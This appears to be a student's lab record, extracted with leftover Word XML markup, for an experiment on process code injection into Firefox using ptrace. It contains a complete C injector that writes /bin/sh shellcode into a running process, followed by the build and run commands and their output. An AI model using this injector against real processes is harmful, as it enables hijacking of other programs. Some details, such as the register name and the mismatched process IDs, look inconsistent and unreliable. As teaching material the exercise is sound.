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EXPT NO: 12                                                                                  ROLL NO: 220701231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 PERFORM CODE INJECTION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8" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="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do process code injection on Firefox using ptrace system call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ALGORITHM:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="137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Find out the pid of the running Firefox program.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9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the code injection file.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7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Get the pid of the Firefox from the command line arguments.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9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Allocate memory buffers for the shellcode.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7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Attach to the victim process with PTRACE_ATTACH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Get the register values of the attached process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="136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 PTRACE_POKETEXT to insert the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Detach from the victim process using PTRACE_DETACH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PROGRAM CODE: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980000"/>
          <w:spacing w:val="0"/>
          <w:position w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve">INJECTOR PROGRAM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&lt;stdio.h&gt;//C standard input output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&lt;stdlib.h&gt;//C Standard General Utilities Library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&lt;string.h&gt;//C string lib header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&lt;unistd.h&gt;//standard symbolic constants and types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&lt;sys/wait.h&gt;//declarations for waiting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&lt;sys/ptrace.h&gt;//gives access to ptrace functionality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# include &lt;sys/user.h&gt;//gives ref to regs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//The shellcode that calls /bin/sh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char shellcode[]={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"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97"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"\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"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};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//header for our program.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void header()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printf("----Memory bytecode injector-----\n");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//main program notice we take command line options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int main(int argc,char**argv)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int i,size,pid=0;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struct user_regs_struct reg;//struct that gives access to registers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                       //note that this regs will be in x64 for me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                       //unless your using 32bit then rip,eax,edx etc...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char*buff;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header();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//we get the command line options and assign them appropriately!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pid=atoi(argv[1]);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size=sizeof(shellcode);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//allocate a char size memory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buff=(char*)malloc(size);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//fill the buff memory with 0s upto size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memset(buff,0x0,size);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//copy shellcode from source to destination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memcpy(buff,shellcode,sizeof(shellcode));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//attach process of pid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ptrace(PTRACE_ATTACH,pid,0,0);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//wait for child to change state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wait((int*)0);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//get process pid registers i.e Copy the process pid's general-purpose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//or floating-point registers,respectively,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//to the address reg in the tracer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ptrace(PTRACE_GETREGS,pid,0,&amp;reg);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printf("Writing EIP 0x%x, process %d\n",reg.eip,pid);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    //Copy the word data to the address buff in the process's memory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for(i=0;i&lt;size;i++){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ptrace(PTRACE_POKETEXT,pid,reg.eip+i,*(int*)(buff+i));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//detach from the process and free buff memory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ptrace(PTRACE_DETACH,pid,0,0);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free(buff);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return 0;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     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20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0" w:line="240"/>
        <w:ind w:right="189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 vi injector.c </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="189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 gcc injector.c -o injector </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="1890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~]#ps -e|grep firefox</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="6263" w:left="-2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1433 ?</w:t>
        <w:tab/>
        <w:t xml:space="preserve">00:01:23 firefox [root@localhost ~]# ./injector 1433</w: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----Memory bytecode injector-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="5220" w:left="-81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Writing EIP 0x6, process 1707 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240"/>
        <w:ind w:right="5220" w:left="-270" w:firstLine="5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8" w:after="0" w:line="240"/>
        <w:ind w:right="0" w:left="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implementation of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process code injection on Firefox using ptrace system call is executed successfully.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